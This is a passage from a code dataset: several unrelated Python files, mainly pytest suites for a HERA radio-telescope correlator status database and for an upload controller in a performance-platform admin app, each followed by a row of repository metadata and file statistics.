expected = corr.SNAPStatus(time=int(floor(t1.gps)),
hostname='heraNode700Snap0',
serial_number='SNPA000700', node=700,
snap_loc_num=0,
psu_alert=False, pps_count=595687,
fpga_temp=57.984954833984375,
uptime_cycles=595686,
last_programmed_time=int(floor(t_prog.gps)))
result = test_session.get_snap_status(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
test_session.add_snap_status(t1, 'heraNode701Snap3', 'SNPD000703',
True, 595699, 59.323028564453125,
595699, t_prog)
result = test_session.get_snap_status(
starttime=t1 - TimeDelta(3.0, format='sec'), nodeID=700)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_snap_status(nodeID=700)
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
expected = corr.SNAPStatus(time=int(floor(t1.gps)),
hostname='heraNode701Snap3',
serial_number='SNPD000703', node=701,
snap_loc_num=3,
psu_alert=True, pps_count=595699,
fpga_temp=59.323028564453125,
uptime_cycles=595699,
last_programmed_time=int(floor(t_prog.gps)))
result = test_session.get_snap_status(
starttime=t1 - TimeDelta(3.0, format='sec'), nodeID=701)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_snap_status(nodeID=701)
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result = test_session.get_snap_status(
starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t1)
assert len(result) == 2
result_most_recent = test_session.get_snap_status()
assert len(result) == 2
result = test_session.get_snap_status(
starttime=t1 + TimeDelta(200.0, format='sec'))
assert result == []
def test_add_snap_status_from_corrcm(mcsession, snapstatus):
test_session = mcsession
test_session.add_snap_status_from_corrcm(
snap_status_dict=snapstatus)
t1 = Time(datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
format='datetime')
t_prog = Time(datetime.datetime(2016, 1, 10, 23, 16, 3), format='datetime')
result = test_session.get_snap_status(
starttime=t1 - TimeDelta(3.0, format='sec'), nodeID=700)
expected = corr.SNAPStatus(time=int(floor(t1.gps)),
hostname='heraNode700Snap0',
serial_number='SNPA000700', node=700,
snap_loc_num=0,
psu_alert=False, pps_count=595687,
fpga_temp=57.984954833984375,
uptime_cycles=595686,
last_programmed_time=int(floor(t_prog.gps)))
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_snap_status(nodeID=700)
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result = test_session.get_snap_status(
starttime=t1 - TimeDelta(3.0, format='sec'), nodeID=701)
expected = corr.SNAPStatus(time=int(floor(t1.gps)),
hostname='heraNode701Snap3',
serial_number='SNPD000703', node=701,
snap_loc_num=3,
psu_alert=False, pps_count=595699,
fpga_temp=59.323028564453125,
uptime_cycles=595699,
last_programmed_time=int(floor(t_prog.gps)))
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_snap_status()
assert len(result_most_recent) == 2
def test_add_snap_status_from_corrcm_with_nones(mcsession, snapstatus_none):
test_session = mcsession
snap_status_obj_list = test_session.add_snap_status_from_corrcm(
snap_status_dict=snapstatus_none, testing=True)
for obj in snap_status_obj_list:
test_session.add(obj)
t1 = Time(datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
format='datetime')
result = test_session.get_snap_status(
starttime=t1 - TimeDelta(3.0, format='sec'))
expected = corr.SNAPStatus(time=int(floor(t1.gps)),
hostname='heraNode700Snap0',
serial_number=None, node=None,
snap_loc_num=None,
psu_alert=None, pps_count=None,
fpga_temp=None, uptime_cycles=None,
last_programmed_time=None)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
def test_snap_status_errors(mcsession):
test_session = mcsession
t1 = Time('2016-01-10 01:15:23', scale='utc')
pytest.raises(ValueError, test_session.add_snap_status,
'foo', 'heraNode700Snap0', 'SNPA000700', False,
595687, 57.984954833984375, 595686, t1)
pytest.raises(ValueError, test_session.add_snap_status,
t1, 'heraNode700Snap0', 'SNPA000700', False, 595687,
57.984954833984375, 595686, 'foo')
def test_get_node_snap_from_serial_nodossier(mcsession):
with pytest.warns(
UserWarning,
match="No active connections returned for snap serial foo. "
"Setting node and snap location numbers to None"
):
node, snap_loc_num = mcsession._get_node_snap_from_serial('foo')
assert node is None
assert snap_loc_num is None
def test_get_node_snap_from_serial_multiple_revs(mcsession):
"""Test multiple snap location numbers."""
part = cm_partconnect.Parts()
part.hpn = 'SNPD000703'
part.hpn_rev = 'B'
part.hptype = 'snap'
part.manufacture_number = 'D000703'
part.start_gpstime = 1230375618
mcsession.add(part)
mcsession.commit()
connection = cm_partconnect.Connections()
connection.upstream_part = 'SNPD000703'
connection.up_part_rev = 'B'
connection.downstream_part = 'N701'
connection.down_part_rev = 'A'
connection.upstream_output_port = 'rack'
connection.downstream_input_port = 'loc2'
connection.start_gpstime = 1230375618
mcsession.add(connection)
mcsession.commit()
with pytest.warns(
UserWarning,
match="There is more that one active revision for snap serial SNPD000703. "
"Setting node and snap location numbers to None"
):
node, snap_loc_num = mcsession._get_node_snap_from_serial('SNPD000703')
assert node is None
assert snap_loc_num is None
def test_get_node_snap_from_serial_multiple_times_diffloc(mcsession):
"""Test multiple times with change in location."""
# stop earlier connection
conn_to_stop = [['SNPD000703', 'A', 'N701', 'A', 'rack', 'loc3',
1230375618]]
cm_partconnect.stop_connections(mcsession, conn_to_stop,
Time(1230375700, format='gps'))
connection = cm_partconnect.Connections()
connection.upstream_part = 'SNPD000703'
connection.up_part_rev = 'A'
connection.downstream_part = 'N701'
connection.down_part_rev = 'A'
connection.upstream_output_port = 'rack'
connection.downstream_input_port = 'loc2'
connection.start_gpstime = 1230375718
mcsession.add(connection)
mcsession.commit()
node, snap_loc_num = checkWarnings(mcsession._get_node_snap_from_serial,
['SNPD000703'], nwarnings=0)
assert node == 701
assert snap_loc_num == 2
def test_get_snap_hostname_from_serial(mcsession, snapstatus):
test_session = mcsession
test_session.add_snap_status_from_corrcm(
snap_status_dict=snapstatus)
hostname = test_session.get_snap_hostname_from_serial('SNPA000700')
assert hostname == 'heraNode700Snap0'
# asking for a hostname from before the part_rosetta was active should give None
hostname = test_session.get_snap_hostname_from_serial(
'SNPA000700', at_date=Time(1512770942, format='unix')
)
assert hostname is None
hostname = test_session.get_snap_hostname_from_serial('blah')
assert hostname is None
@requires_redis
def test_site_add_snap_status_from_corrcm(mcsession):
test_session = mcsession
# get the snap status dict from the correlator redis
snap_status_dict = corr._get_snap_status()
assert len(snap_status_dict) >= 1
# use the real (not test) database to get the node & snap location number
real_db = mc.connect_to_mc_db(None)
real_session = real_db.sessionmaker()
test_session.add_snap_status_from_corrcm(cm_session=real_session)
result = test_session.get_snap_status(most_recent=True)
assert len(result) >= 1
def test_add_antenna_status(mcsession):
test_session = mcsession
t1 = Time('2016-01-10 01:15:23', scale='utc')
t2 = t1 + TimeDelta(120.0, format='sec')
eq_coeffs = (np.zeros((5)) + 56.921875).tolist()
histogram_bins = [-4, -3, -2, -1, 0, 1, 2, 3]
histogram = [0, 3, 6, 10, 12, 8, 4, 0]
pam_id_list = [112, 217, 32, 59, 1, 0, 0, 14]
pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
test_session.add_antenna_status(t1, 4, 'e', 'heraNode700Snap0', 3,
-0.5308380126953125, 3.0134560488579285,
9.080917358398438, 0, -13.349140985640002,
10.248, 0.6541, pam_id, 6.496,
0.5627000000000001, fem_id,
'antenna', True,
1.3621702512711602, 30.762719534238915,
26.327341308593752, False, eq_coeffs,
histogram_bins, histogram)
eq_coeffs_string = '[56.921875,56.921875,56.921875,56.921875,56.921875]'
histogram_bin_string = '[-4,-3,-2,-1,0,1,2,3]'
histogram_string = '[0,3,6,10,12,8,4,0]'
expected = corr.AntennaStatus(time=int(floor(t1.gps)), antenna_number=4,
antenna_feed_pol='e',
snap_hostname='heraNode700Snap0',
snap_channel_number=3,
adc_mean=-0.5308380126953125,
adc_rms=3.0134560488579285,
adc_power=9.080917358398438, pam_atten=0,
pam_power=-13.349140985640002,
pam_voltage=10.248,
pam_current=0.6541,
pam_id=pam_id,
fem_voltage=6.496,
fem_current=0.5627000000000001,
fem_id=fem_id,
fem_switch='antenna',
fem_lna_power=True,
fem_imu_theta=1.3621702512711602,
fem_imu_phi=30.762719534238915,
fem_temp=26.327341308593752,
fft_overflow=False,
eq_coeffs=eq_coeffs_string,
histogram_bin_centers=histogram_bin_string,
histogram=histogram_string)
result = test_session.get_antenna_status(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
eq_coeffs = (np.zeros((5)) + 73.46875).tolist()
histogram_bins = [-4, -3, -2, -1, 0, 1, 2, 3]
histogram = [0, 3, 6, 10, 12, 8, 4, 0]
pam_id_list = [112, 84, 143, 59, 1, 0, 0, 242]
pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
test_session.add_antenna_status(t2, 31, 'n', 'heraNode4Snap3', 7,
-0.4805450439453125, 16.495319974304454,
272.0955810546875, 0, -32.03119784856,
10.268, 0.6695000000000001, pam_id,
None, None, fem_id,
'noise', False,
1.3621702512711602, 30.762719534238915,
27.828854980468755, True, eq_coeffs,
histogram_bins, histogram)
result = test_session.get_antenna_status(
starttime=t1 - TimeDelta(3.0, format='sec'), antenna_number=4)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_antenna_status(antenna_number=4)
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
eq_coeffs_string = '[73.46875,73.46875,73.46875,73.46875,73.46875]'
histogram_bin_string = '[-4,-3,-2,-1,0,1,2,3]'
histogram_string = '[0,3,6,10,12,8,4,0]'
expected = corr.AntennaStatus(time=int(floor(t2.gps)), antenna_number=31,
antenna_feed_pol='n',
snap_hostname='heraNode4Snap3',
snap_channel_number=7,
adc_mean=-0.4805450439453125,
adc_rms=16.495319974304454,
adc_power=272.0955810546875, pam_atten=0,
pam_power=-32.03119784856,
pam_voltage=10.268,
pam_current=0.6695000000000001,
pam_id=pam_id,
fem_voltage=None,
fem_current=None,
fem_id=fem_id,
fem_switch='noise',
fem_lna_power=False,
fem_imu_theta=1.3621702512711602,
fem_imu_phi=30.762719534238915,
fem_temp=27.828854980468755,
fft_overflow=True,
eq_coeffs=eq_coeffs_string,
histogram_bin_centers=histogram_bin_string,
histogram=histogram_string)
result = test_session.get_antenna_status(
starttime=t1 - TimeDelta(3.0, format='sec'), antenna_number=31)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_antenna_status(antenna_number=31)
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result = test_session.get_antenna_status(
starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t1)
assert len(result) == 1
result_most_recent = test_session.get_antenna_status()
assert len(result) == 1
result = test_session.get_antenna_status(
starttime=t1 + TimeDelta(200.0, format='sec'))
assert result == []
def test_add_antenna_status_from_corrcm(mcsession, antstatus):
test_session = mcsession
ant_status_obj_list = test_session.add_antenna_status_from_corrcm(
ant_status_dict=antstatus, testing=True)
for obj in ant_status_obj_list:
test_session.add(obj)
t1 = Time(datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
format='datetime')
result = test_session.get_antenna_status(
starttime=t1 - TimeDelta(3.0, format='sec'), antenna_number=4)
eq_coeffs_str = [str(val) for val
in (np.zeros((1024)) + 56.921875).tolist()]
eq_coeffs_string = '[' + ','.join(eq_coeffs_str) + ']'
histogram_bin_str = [str(val) for val
in np.arange(-128, 182, dtype=np.int_).tolist()]
histogram_bin_string = '[' + ','.join(histogram_bin_str) + ']'
histogram_str = [str(val) for val in (np.zeros((256)) + 10).tolist()]
histogram_string = '[' + ','.join(histogram_str) + ']'
pam_id_list = [112, 217, 32, 59, 1, 0, 0, 14]
pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
expected = corr.AntennaStatus(time=int(floor(t1.gps)), antenna_number=4,
antenna_feed_pol='e',
snap_hostname='heraNode700Snap0',
snap_channel_number=3,
adc_mean=-0.5308380126953125,
adc_rms=3.0134560488579285,
adc_power=9.080917358398438,
pam_atten=0,
pam_power=-13.349140985640002,
pam_voltage=10.248,
pam_current=0.6541,
pam_id=pam_id,
fem_voltage=6.496,
fem_current=0.5627000000000001,
fem_id=fem_id,
fem_switch='antenna',
fem_lna_power=True,
fem_imu_theta=1.3621702512711602,
fem_imu_phi=30.762719534238915,
fem_temp=26.327341308593752,
fft_overflow=False,
eq_coeffs=eq_coeffs_string,
histogram_bin_centers=histogram_bin_string,
histogram=histogram_string)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_antenna_status(antenna_number=4)
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result = test_session.get_antenna_status(
starttime=t1 - TimeDelta(3.0, format='sec'), antenna_number=31)
eq_coeffs_str = [str(val) for val in
(np.zeros((1024)) + 73.46875).tolist()]
eq_coeffs_string = '[' + ','.join(eq_coeffs_str) + ']'
histogram_bin_str = [str(val) for val
in np.arange(-128, 182, dtype=np.int_).tolist()]
histogram_bin_string = '[' + ','.join(histogram_bin_str) + ']'
histogram_str = [str(val) for val in (np.zeros((256)) + 12).tolist()]
histogram_string = '[' + ','.join(histogram_str) + ']'
pam_id_list = [112, 84, 143, 59, 1, 0, 0, 242]
pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
expected = corr.AntennaStatus(time=int(floor(t1.gps)), antenna_number=31,
antenna_feed_pol='n',
snap_hostname='heraNode4Snap3',
snap_channel_number=7,
adc_mean=-0.4805450439453125,
adc_rms=16.495319974304454,
adc_power=272.0955810546875, pam_atten=0,
pam_power=-32.03119784856,
pam_voltage=10.268,
pam_current=0.6695000000000001,
pam_id=pam_id,
fem_voltage=None,
fem_current=None,
fem_id=fem_id,
fem_switch='noise',
fem_lna_power=False,
fem_imu_theta=1.3621702512711602,
fem_imu_phi=30.762719534238915,
fem_temp=27.828854980468755,
fft_overflow=True,
eq_coeffs=eq_coeffs_string,
histogram_bin_centers=histogram_bin_string,
histogram=histogram_string)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_antenna_status()
assert len(result_most_recent) == 2
def test_add_antenna_status_from_corrcm_with_nones(mcsession, antstatus_none):
test_session = mcsession
checkWarnings(test_session.add_antenna_status_from_corrcm,
func_kwargs={'ant_status_dict': antstatus_none},
message='fem_switch value is Unknown mode')
t1 = Time(datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
format='datetime')
result = test_session.get_antenna_status(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(result) == 2
expected = corr.AntennaStatus(time=int(floor(t1.gps)), antenna_number=4,
antenna_feed_pol='e',
snap_hostname=None, snap_channel_number=None,
adc_mean=None, adc_rms=None,
adc_power=None, pam_atten=None,
pam_power=None, pam_voltage=None,
pam_current=None, pam_id=None,
fem_voltage=None, fem_current=None,
fem_id=None, fem_switch=None,
fem_lna_power=None, fem_imu_theta=None,
fem_imu_phi=None,
fem_temp=None, fft_overflow=None, eq_coeffs=None,
histogram_bin_centers=None, histogram=None)
result = test_session.get_antenna_status(antenna_number=4)
result = result[0]
assert result.isclose(expected)
expected = corr.AntennaStatus(time=int(floor(t1.gps)), antenna_number=31,
antenna_feed_pol='n',
snap_hostname=None, snap_channel_number=None,
adc_mean=None, adc_rms=None,
adc_power=None, pam_atten=None,
pam_power=None, pam_voltage=None,
pam_current=None, pam_id=None,
fem_voltage=None, fem_current=None,
fem_id=None, fem_switch=None,
fem_lna_power=None, fem_imu_theta=None,
fem_imu_phi=None,
fem_temp=None, fft_overflow=None, eq_coeffs=None,
histogram_bin_centers=None, histogram=None)
result = test_session.get_antenna_status(antenna_number=31)
result = result[0]
assert result.isclose(expected)
def test_antenna_status_errors(mcsession):
test_session = mcsession
t1 = Time('2016-01-10 01:15:23', scale='utc')
eq_coeffs = (np.zeros((5)) + 56.921875).tolist()
histogram_bins = [-4, -3, -2, -1, 0, 1, 2, 3]
histogram = [0, 3, 6, 10, 12, 8, 4, 0]
pam_id_list = [112, 217, 32, 59, 1, 0, 0, 14]
pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
pytest.raises(ValueError, test_session.add_antenna_status,
'foo', 4, 'e', 'heraNode700Snap0', 3, -0.5308380126953125,
3.0134560488579285, 9.080917358398438, 0,
-13.349140985640002, 10.248, 0.6541, pam_id,
6.496, 0.5627000000000001, fem_id,
'antenna', True, 1.3621702512711602, 30.762719534238915,
26.327341308593752, False, eq_coeffs,
histogram_bins, histogram)
pytest.raises(ValueError, test_session.add_antenna_status,
t1, 4, 'e', 'heraNode700Snap0', 3, -0.5308380126953125,
3.0134560488579285, 9.080917358398438, 0,
-13.349140985640002, 10.248, 0.6541, pam_id,
6.496, 0.5627000000000001, fem_id,
'foo', True, 1.3621702512711602, 30.762719534238915,
26.327341308593752, False, eq_coeffs,
histogram_bins, histogram)
pytest.raises(ValueError, test_session.add_antenna_status,
t1, 4, 'x', 'heraNode700Snap0', 3, -0.5308380126953125,
3.0134560488579285, 9.080917358398438, 0,
-13.349140985640002, 10.248, 0.6541, pam_id,
6.496, 0.5627000000000001, fem_id,
'load', True, 1.3621702512711602, 30.762719534238915,
26.327341308593752, False, eq_coeffs,
histogram_bins, histogram)
@requires_redis
def test_site_add_antenna_status_from_corrcm(mcsession):
test_session = mcsession
test_session.add_antenna_status_from_corrcm()
result = test_session.get_antenna_status(most_recent=True)
assert len(result) >= 1
| 41.181412 | 94 | 0.628651 | 10,961 | 92,164 | 4.985312 | 0.055196 | 0.056365 | 0.02972 | 0.03294 | 0.835096 | 0.796409 | 0.769783 | 0.740777 | 0.711222 | 0.684375 | 0 | 0.072915 | 0.265939 | 92,164 | 2,237 | 95 | 41.199821 | 0.734783 | 0.032735 | 0 | 0.658784 | 0 | 0.001126 | 0.090843 | 0.006758 | 0.003378 | 0 | 0 | 0 | 0.153153 | 1 | 0.033221 | false | 0 | 0.007883 | 0.005068 | 0.047297 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
48b4192d3fda98f984cbda6938341dd00524be9b | 448 | py | Python | ide/utils/sdk/__init__.py | Ramonrlb/cloudpebble | 20b5408724aa810ce1626552d9f1062f1094fc3b | [
"MIT"
] | 147 | 2015-01-11T04:33:10.000Z | 2021-08-12T18:22:52.000Z | ide/utils/sdk/__init__.py | Ramonrlb/cloudpebble | 20b5408724aa810ce1626552d9f1062f1094fc3b | [
"MIT"
] | 155 | 2015-01-02T12:54:30.000Z | 2020-11-06T19:17:09.000Z | ide/utils/sdk/__init__.py | gfunkmonk/cloudpebble-1 | c5b63483ac26ae0d60ac7ef1bf9e803400188e91 | [
"MIT"
] | 105 | 2015-01-01T21:04:36.000Z | 2021-01-22T22:10:38.000Z | from manifest import generate_manifest, generate_manifest_dict, load_manifest_dict, dict_to_pretty_json, manifest_name_for_project
from sdk_scripts import generate_wscript_file, generate_jshint_file
from project_assembly import assemble_project
__all__ = ['generate_manifest', 'generate_manifest_dict', 'load_manifest_dict', 'dict_to_pretty_json', 'manifest_name_for_project', 'generate_wscript_file', 'generate_jshint_file', 'assemble_project']
| 64 | 200 | 0.866071 | 60 | 448 | 5.833333 | 0.333333 | 0.182857 | 0.137143 | 0.182857 | 0.725714 | 0.725714 | 0.514286 | 0.514286 | 0.514286 | 0.514286 | 0 | 0 | 0.064732 | 448 | 6 | 201 | 74.666667 | 0.835322 | 0 | 0 | 0 | 1 | 0 | 0.352679 | 0.151786 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d2daf5cf62cccbdde48c66c1c3fde01a8694e5a8 | 127 | py | Python | src/factories/optimizer_factory.py | gmum/cwae-pytorch | 7fb31a5d12a0a637be7dde76f0e11e80ec4a345d | [
"MIT"
] | 4 | 2020-08-20T20:51:24.000Z | 2022-01-26T23:56:35.000Z | src/factories/optimizer_factory.py | gmum/cwae-pytorch | 7fb31a5d12a0a637be7dde76f0e11e80ec4a345d | [
"MIT"
] | null | null | null | src/factories/optimizer_factory.py | gmum/cwae-pytorch | 7fb31a5d12a0a637be7dde76f0e11e80ec4a345d | [
"MIT"
] | 1 | 2021-12-24T14:13:40.000Z | 2021-12-24T14:13:40.000Z | from torch.optim import Adam
def get_optimizer_factory(parameters: dict, lr: float):
return Adam(parameters, lr=lr)
| 21.166667 | 56 | 0.732283 | 18 | 127 | 5.055556 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181102 | 127 | 5 | 57 | 25.4 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
826f8d10a222e567516cd9a14884b4a15ebe6980 | 105 | py | Python | carapace/__init__.py | mikemalinowski/carapace | e6e0e8378ca009dba7880de6401eed6ab8b6d106 | [
"MIT"
] | null | null | null | carapace/__init__.py | mikemalinowski/carapace | e6e0e8378ca009dba7880de6401eed6ab8b6d106 | [
"MIT"
] | 6 | 2020-06-29T02:49:52.000Z | 2020-06-29T03:09:03.000Z | carapace/__init__.py | mikemalinowski/carapace | e6e0e8378ca009dba7880de6401eed6ab8b6d106 | [
"MIT"
] | null | null | null | from .core import Tool
from .core import toolkit
from . import ui
from .ui.widgets.toolbar import launch | 21 | 38 | 0.790476 | 17 | 105 | 4.882353 | 0.529412 | 0.192771 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152381 | 105 | 5 | 38 | 21 | 0.932584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8296a856e62d940f1311d8d18771a8bb95680916 | 13,023 | py | Python | tests/application/controllers/test_upload.py | alphagov-mirror/performanceplatform-admin | b63ae42b1276699623ef208b7d6edd3e0ce4ca59 | [
"MIT"
] | 1 | 2017-05-14T21:31:33.000Z | 2017-05-14T21:31:33.000Z | tests/application/controllers/test_upload.py | alphagov-mirror/performanceplatform-admin | b63ae42b1276699623ef208b7d6edd3e0ce4ca59 | [
"MIT"
] | 33 | 2015-01-05T12:23:45.000Z | 2021-03-24T10:59:47.000Z | tests/application/controllers/test_upload.py | alphagov-mirror/performanceplatform-admin | b63ae42b1276699623ef208b7d6edd3e0ce4ca59 | [
"MIT"
] | 4 | 2017-03-16T15:52:33.000Z | 2021-04-10T20:14:53.000Z | from hamcrest import (
assert_that, equal_to, ends_with,
contains_string, has_entries
)
from mock import patch, Mock
from StringIO import StringIO
from tests.application.support.flask_app_test_case import (
FlaskAppTestCase, signed_in)
import requests
class UploadTestCase(FlaskAppTestCase):
def setUp(self):
self.app.config['WTF_CSRF_ENABLED'] = False
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
@patch('application.files.uploaded.UploadedFile.is_virus')
@patch('performanceplatform.client.data_set.DataSet.post')
def test_user_can_post_to_upload_data(
self,
data_set_post_patch,
is_virus_patch,
get_data_set_patch,
client):
is_virus_patch.return_value = False
get_data_set_patch.return_value = {
'data_group': 'carers-allowance',
'data_type': 'volumetrics',
'bearer_token': 'abc123', 'foo': 'bar'
}
post_data = {
'file':
(StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
'MYSPECIALFILE.csv')
}
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data=post_data)
expected_post = [{u'_timestamp': u'2014-08-05T00:00:00Z', u'foo': 40}]
data_set_post_patch.assert_called_once_with(expected_post)
upload_done_path = '/upload-data'
assert_that(response.headers['Location'], ends_with(upload_done_path))
assert_that(response.status_code, equal_to(302))
assert_that(
self.get_from_session('upload_data'),
has_entries({
u'data_type': u'volumetrics',
u'data_group': u'carers-allowance'
}))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
def test_no_data_set_config_returns_error(
self,
get_data_set_patch,
client):
get_data_set_patch.return_value = None
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data={'file': (StringIO('data'), 'file.xlsx')})
assert_that(response.data, contains_string(
'There is no data set of for data-group'))
assert_that(response.status_code, equal_to(404))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
def test_http_error_from_stagecraft_flashes_message(
self,
get_data_set_patch,
client):
get_data_set_patch.side_effect = backdrop_response(403, {})
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data={'file': (StringIO('data'), 'file.xlsx')})
assert_that(
self.get_from_session('upload_data')['payload'],
equal_to(['[403] {}']))
assert_that(response.headers['Location'], ends_with('/upload-data'))
assert_that(response.status_code, equal_to(302))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
@patch('application.files.uploaded.UploadedFile.is_virus')
@patch('performanceplatform.client.data_set.DataSet.post')
def test_http_error_from_backdrop_flashes_message(
self,
data_set_post_patch,
is_virus_patch,
get_data_set_patch,
client):
is_virus_patch.return_value = False
get_data_set_patch.return_value = {
'data_group': 'carers-allowance',
'data_type': 'volumetrics',
'bearer_token': 'abc123', 'foo': 'bar'
}
data_set_post_patch.side_effect = backdrop_response(401, {})
post_data = {
'file':
(StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
'MYSPECIALFILE.csv')
}
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data=post_data)
assert_that(
self.get_from_session('upload_data')['payload'],
equal_to(['[401] {}']))
assert_that(response.headers['Location'], ends_with('/upload-data'))
assert_that(response.status_code, equal_to(302))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
@patch('application.files.uploaded.UploadedFile.is_virus')
@patch('performanceplatform.client.data_set.DataSet.post')
def test_unauthorized_from_backdrop_json(
self,
data_set_post_patch,
is_virus_patch,
get_data_set_patch,
client):
is_virus_patch.return_value = False
get_data_set_patch.return_value = {
'data_group': 'carers-allowance',
'data_type': 'volumetrics',
'bearer_token': 'abc123', 'foo': 'bar'
}
data_set_post_patch.side_effect = backdrop_response(401, {})
post_data = {
'file':
(StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
'MYSPECIALFILE.csv')
}
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data=post_data,
headers={'Accept': 'application/json'},
)
assert_that(response.status_code, equal_to(500))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
@patch('application.files.uploaded.UploadedFile.is_virus')
@patch('performanceplatform.client.data_set.DataSet.post')
def test_http_error_from_backdrop_json(
self,
data_set_post_patch,
is_virus_patch,
get_data_set_patch,
client):
is_virus_patch.return_value = False
get_data_set_patch.return_value = {
'data_group': 'carers-allowance',
'data_type': 'volumetrics',
'bearer_token': 'abc123', 'foo': 'bar'
}
data_set_post_patch.side_effect = backdrop_response(400, {})
post_data = {
'file':
(StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
'MYSPECIALFILE.csv')
}
response = client.post(
'/upload-data/carers-allowance/volumetrics',
data=post_data,
headers={'Accept': 'application/json'},
)
assert_that(response.status_code, equal_to(400))
@signed_in()
@patch('performanceplatform.client.admin.AdminAPI.get_data_set')
@patch('application.files.uploaded.UploadedFile.is_virus')
@patch('performanceplatform.client.data_set.DataSet.post')
def test_validation_error_from_backdrop_json(
self,
data_set_post_patch,
is_virus_patch,
get_data_set_patch,
client):
is_virus_patch.return_value = False
get_data_set_patch.return_value = {
'data_group': 'carers-allowance',
'data_type': 'volumetrics',
'bearer_token': 'abc123', 'foo': 'bar'
}
data_set_post_patch.side_effect = backdrop_response(
400,
{
"messages": ['message_1', 'message_2']
}
)
